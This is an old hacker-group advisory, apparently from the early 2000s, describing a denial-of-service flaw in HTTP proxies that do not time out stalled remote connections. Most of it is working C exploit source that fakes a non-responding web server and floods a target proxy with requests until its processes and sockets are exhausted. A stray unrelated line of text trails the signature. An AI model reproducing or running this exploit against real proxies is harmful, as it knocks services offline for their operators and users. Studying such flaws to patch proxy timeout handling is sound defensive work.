HTTP Proxies Denial of Service by SectorX of XOR (http://xorteam.cjb.net) The theory ========== While browsing through my own http proxy code, i noticed an interesting coding mistake - the proxy did not perfrom timeout checking on the remote host the user was connecting to. since every time a user requests a file the proxy spawns him a process, i figured this could be used for a nice fork() attack, or make the proxy run out of available sockets. I tested it against delegate 6.1.13, it created some system lag and then ran out of free sockets, and couldnt accept anymore connections. I _assume_ this makes alot of http proxies vulnerable, since this seems like a common mistake. Exploit ======= This code acts as a webserver and a proxy client. it binds port 80 and sets listen() to keep ALOT of connections holding, then connects to the target proxy and starts spawning connections to its fake httpd, thus creating alot of stalled child processes. this was coded in a rush so dont mind its uglyness =p -- snip snip -- #include #include #include #include #include #include #include #include #define HOLD 65535 #define MAX 4096 #define PORT 8080 void Stall(void) { if (!fork()) { struct sockaddr_in box; int sock; sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock<0) { perror("socket()"); exit(1); } memset(&box,0,sizeof(struct sockaddr_in)); box.sin_addr.s_addr = INADDR_ANY; box.sin_port = htons(80); box.sin_family = AF_INET; if (bind(sock,(struct sockaddr*)&box,sizeof(struct sockaddr))<0) { perror("bind() "); exit(1); } if (listen(sock,HOLD)<0) { perror("listen() "); exit(1); } for (;;); /* keep holding up the connections */ } } int Connect(int ip, int port) { int sock; struct sockaddr_in x0r; sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock<0) { perror("Connect()->socket() "); return -1; } memset(&x0r,0,sizeof(struct sockaddr_in)); x0r.sin_port = htons(port); x0r.sin_addr.s_addr = ip; x0r.sin_family = AF_INET; if (connect(sock,(struct sockaddr*)&x0r,sizeof(struct sockaddr))<0) perror("Connect()->connect() "); return sock; } int sprint(int fd, const char *str,...) { va_list args; char msg[MAX]; memset(&msg,0,sizeof(msg)); va_start(args,str); vsnprintf(msg,MAX,str,args); return(write(fd,msg,strlen(msg))); } int main(int argc, char *argv[]) { int fd=1,keepalive=1; fprintf(stderr, "Many http proxies denial of service by sectorx\n"); if (argc < 3) { fprintf(stderr, "usage: %s [ -no-keepalive ]\n",argv[0]); exit(1); } if (argc>3) keepalive=0; fprintf(stderr, "Keep-alive = %d\n",keepalive); Stall(); fprintf(stderr, "Attacking: "); while (fd>0) { fd = Connect(inet_addr(argv[2]),PORT); sprint(fd,"GET http://%s/ HTTP/1.0\n\n",argv[1]); if (keepalive == 0) close(fd); fprintf(stderr, "."); } if (keepalive == 1) for(;;); } -- snip snip -- --SectorX of XOR Team (http://xorteam.cjb.net)

亚洲欧美在线